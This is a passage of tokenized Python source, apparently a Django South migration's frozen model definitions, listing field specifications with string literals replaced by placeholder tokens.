"<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : 
{ <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , 
'<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:end>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , 
<EOL> '<STR_LIT:start>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' 
: '<STR_LIT:0>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : 
'<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:result>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , 
'<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : 
'<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> 
